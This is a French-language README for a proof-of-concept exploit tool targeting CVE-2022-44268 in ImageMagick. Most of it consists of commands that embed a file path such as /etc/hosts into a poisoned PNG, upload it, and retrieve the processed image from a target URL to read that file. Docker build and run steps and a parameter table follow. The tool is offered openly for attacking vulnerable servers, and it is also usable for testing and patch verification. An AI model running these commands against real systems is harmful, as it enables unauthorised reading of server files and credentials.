
Preuve de concept pour CVE-2022-44268 permettant la lecture arbitraire de fichiers via des images PNG empoisonnées téléversées sur des instances ImageMagick vulnérables. Inclut la prise en charge de Docker et l'extraction basée sur des URL.
CVE-2022-44268 ImageMagick Lecture de fichier arbitraire - Preuve de concept d'exploit
Empoisonner l'image ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Télécharger l'image PNG empoisonnée.
Vérifier si l'exploit a réussi 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Construction
docker build -t cve-2022-44268 .
Exécution
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Paramètre | Description | Type |
|---|---|---|
| --url | L'URL de l'image PNG téléchargée | Chaîne |
| --image | Fichier PNG d'entrée | Fichier |
| --output | Fichier PNG de sortie | Fichier |
| --file-to-read | Fichier à lire depuis l'hôte vulnérable | Chaîne |